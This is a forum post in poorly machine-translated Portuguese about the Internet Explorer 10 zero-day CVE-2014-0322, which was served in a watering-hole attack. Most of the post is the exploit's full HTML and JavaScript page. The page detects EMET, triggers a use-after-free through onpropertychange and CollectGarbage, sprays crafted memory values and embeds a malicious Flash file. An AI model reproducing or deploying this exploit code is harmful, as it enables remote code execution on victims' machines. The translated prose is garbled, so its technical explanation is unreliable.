Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

O-dia em Internet Explorer 10 Execução de Código Remota (CVE-2014-0322) [Explore]

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Equipe de Tradução O-dia em Internet Explorer 10 Execução de Código Remota (CVE-2014-0322) [Explore]



    Os investigadores de segurança de FireEye descobriram uma façanha nova IE 10 0-dia (CVE-2014-0322) que está sendo usado em um ataque de Molhar Ataque de Buraco e ser servido da teia de lugar de Veterans norte-americano de Guerras Estrangeiras (vfw [. ]org), somando um iFrame.

    O objetivo do ataque é centrado em IE 10 com Jogador de Flash de Adobe no qual o resto do ataque é coordenado. O fracasso de segurança busca um erro de uso liberação (usar-depois de-livre) isso dá para o atacante acesso direto para a memória em um endereço arbitrário, usando um arquivo corrupto de Flash de Adobe, podendo passar para a proteção Plano Espacial Randomization (ASLR) e Prevenção de Datas de Execução (DEP).

    A façanha tem um * .html um * .swf (eu arquivo corrupto de Flash de Adobe) e um * .as3.



    O html contém:
    Código:
    <html>
    
    <head id="headId">
     <title>main page</title>
     <script>
      function dword2data(dword) {
       var d = Number(dword).toString(16);
       while (d.length < 8)
        d = '0' + d;
       return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
      }
    
      function developonther(txt) {
       var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
       xmlDoc.async = true;
       xmlDoc.loadXML(txt);
       if (xmlDoc.parseError.errorCode != 0) {
        var err;
        err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
        err += "Error Reason: " + xmlDoc.parseError.reason;
        err += "Error Line: " + xmlDoc.parseError.line;
        if (err.indexOf("-2147023083") > 0) {
         return 1;
        } else {
         return 0;
        }
       }
       return 0;
      }
    
      var g_arr = [];
      var arrLen = 0x250;
    
      function fun() {
    
       var a = 0;
       for (a = 0; a < arrLen; ++a) {
        g_arr[a] = document.createElement('div')
       };
       var b = dword2data(0xdeadc0de);
       var c = 0x1a1b2000;
       while (b.length < 0x360) {
        if (b.length == (0x94 / 2)) {
         b += dword2data(c + 0x10 - 0x0c)
        } else if (
         b.length == (0x98 / 2)) {
         b += dword2data(c + 0x14 - 0x8)
        } else if (b.length == (0xac / 2)) {
         b += dword2data(c - 0x10)
        } else if (b.length == (0x15c / 2)) {
         b += dword2data(0x42424242)
        } else {
         b += dword2data(0x1a1b2000 - 0x10)
        }
       };
       var d = b.substring(0, (0x340 - 2) / 2);
       try {
        this.outerHTML = this.outerHTML
       } catch (e) {}
       CollectGarbage();
       for (a = 0; a < arrLen; ++a) {
        g_arr[a].title = d.substring(0, d.length);
       }
      }
    
      function puIHa3() {
    
       var bamboo_go = "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>";
    
       if (navigator.userAgent.indexOf("MSIE 10.0") > 0) {
        if (developonther(bamboo_go)) {
    
         return;
        }
        var a = document.getElementsByTagName("script");
        var b = a[0];
        b.onpropertychange = fun;
        var c = document.createElement('SELECT');
        c = b.appendChild(c);
       } else if (navigator.userAgent.indexOf("IE10") > 0) {
        if (developonther(bamboo_go)) {
    
         return;
        }
        var a = document.getElementsByTagName("script");
        var b = a[0];
        b.onpropertychange = fun;
        var c = document.createElement('SELECT');
        c = b.appendChild(c);
       }
      }
     </script>
     <embed src=Tope.swf width=10 height=10></embed>
    </head>
    
    </html>

    Escrito por: Salu2 e Zion3R

    até a próxima galera.
    Att: rylook
X
Working...
X